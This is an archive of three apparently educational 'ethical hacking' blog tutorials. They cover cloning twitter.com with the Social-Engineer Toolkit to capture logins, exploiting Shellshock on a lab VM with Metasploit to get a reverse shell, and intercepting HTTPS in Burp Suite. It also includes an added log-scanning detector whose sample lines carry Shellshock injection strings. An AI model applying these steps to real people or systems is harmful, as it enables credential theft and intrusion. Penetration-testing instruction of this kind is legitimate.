Archive of articles published in May 2019

Ethical Hacking: SET

10/05/2019

Social Engineering Toolkit

The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the https://www.social-engineer.org launch and has quickly become a standard tool in a penetration tester's arsenal. SET was written by David Kennedy (ReL1K), and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization, used during a penetration test.

By using SET, we can clone any website and capture the username and password that are entered into the clone.

For this tutorial, let us try to get a username and password from twitter.com.

In Kali Linux, type: “setoolkit”

After you see the picture above, type 1

Type 2

Type 3

Type 2 then press Enter, and you will see a display like the picture below

Next, we have to enter our IP address. In this case, my IP is 10.0.2.15. Then press Enter.

We type the site that we want to clone.

Next, we go to the browser and type the IP address, and we will be shown a page like the picture below. Then, input the username and password and press Enter.

The browser will then be redirected to the real page, which is served over SSL.

We have successfully captured the username and password.


Ethical Hacking: Metasploit

9/05/2019

In this post, we use Metasploit to scan for a vulnerability that exists in the vulnerable VM and then to exploit that vulnerability.

Open a terminal in Kali Linux and type msfconsole.

Then, type search shellshock to search for exploits.

Search for the apache_mod_cgi_bash_env_exec module, and copy the location:

Load the exploit by typing use followed by the location we just copied:

Type options to see the various settings for this module:

Next, set the remote host to the IP address of the target. In this case it is 10.0.2.5.

Also set the local host to the IP address of your Kali Linux machine.

Finally, set the target URI to the file we placed in the /cgi-bin directory:

Type show payloads to view different payloads and information regarding each of them:

A reverse TCP shell will be enough. Type set payload linux/x86/shell/reverse_tcp:

Type options again to check the current settings for this module:

After we are done checking, type check, and if the module allows it, information about whether the target is vulnerable or not will be displayed:

We can see that the target is vulnerable, so use the exploit command to launch the attack.

A shell session is opened, and we can now run commands like id and whoami to view information about the current user:
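
For the defending side: the following Python script is an added example, not part of the original post or of Metasploit. It scans Apache combined-format access log lines for the Bash function definition ("() {") that Shellshock input carries, checking the request line, Referer and User-Agent. The log lines, the 192.0.2.x addresses and the status.cgi file name are constructed for the example.

```python
import re

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
QUOTED = r'((?:[^"\\]|\\.)*)'   # Apache writes embedded quotes as \"
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "' + QUOTED + r'" (\d{3}) (\S+) "'
    + QUOTED + r'" "' + QUOTED + r'"$'
)
# Shellshock input starts an environment value with a Bash function definition.
FUNC_DEF = re.compile(r'\(\)\s*\{')

def find_shellshock_attempts(lines, cgi_prefix="/cgi-bin/"):
    """Return one dict per log line that carries '() {' in a logged field."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = COMBINED.match(line.strip())
        if not m:
            continue  # not a combined-format line; skip rather than guess
        host, _time, request, status, _size, referer, agent = m.groups()
        fields = {"request": request, "referer": referer, "agent": agent}
        tainted = sorted(k for k, v in fields.items() if FUNC_DEF.search(v))
        if not tainted:
            continue
        parts = request.split()
        path = parts[1] if len(parts) >= 2 else ""
        hits.append({
            "line": lineno, "src": host, "path": path, "fields": tainted,
            # A CGI path with a 2xx status goes to the top of the triage queue.
            "cgi": path.startswith(cgi_prefix), "status": int(status),
        })
    return hits

# Constructed sample log lines (not taken from the original post).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/May/2019:10:01:02 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.10 - - [09/May/2019:10:02:10 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" '
    '200 64 "-" "() { :; }; echo constructed-sample"',
    '192.0.2.11 - - [09/May/2019:10:02:40 +0000] "GET /about.html HTTP/1.1" '
    '404 196 "() { x; }; echo constructed-sample" "curl/7.64.0"',
    'not a log line',
]

if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(hit)
```

Headers that the combined format does not record (Cookie, for example) are invisible to this check, so covering them needs a custom LogFormat or inspection in front of the web server.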


Ethical Hacking: HTTPS Digital Certificate

8/05/2019

First, open the Mozilla Firefox browser and start Burp Suite.

Now, we are going to set our proxy to manual in Mozilla Firefox.

Click “Open menu”, which looks like a three-bar button. Then click Preferences.

After clicking Preferences, we will be shown something like the image below.

Now at the top right corner, there is a search bar. In the search bar, type “proxy”. Then click the Settings button.

Now, just click Manual proxy configuration, then click OK.

Now, we are going to create a new SSL certificate using OpenSSL.

These are the files that were created with OpenSSL: ca.der, server.key.der, and server.key.pkcs8.der

Next, we must import the SSL certificate that we made into Burp Suite and into our browser.

Click the “Import/export certificate” button.

We also need to import the SSL certificate in our browser.

Preferences > Privacy and Security (scroll to the very bottom) > Certificates > View Certificates

In View Certificates, choose the “Authorities” section and click Import. Choose the ca.der file.

Now, after setting up our own SSL certificate in Burp Suite and Mozilla Firefox, browse to any website and its SSL certificate will appear under “Verisign Corp”.

Below is a picture of HTTPS traffic captured by Burp Suite when browsing youtube.com.
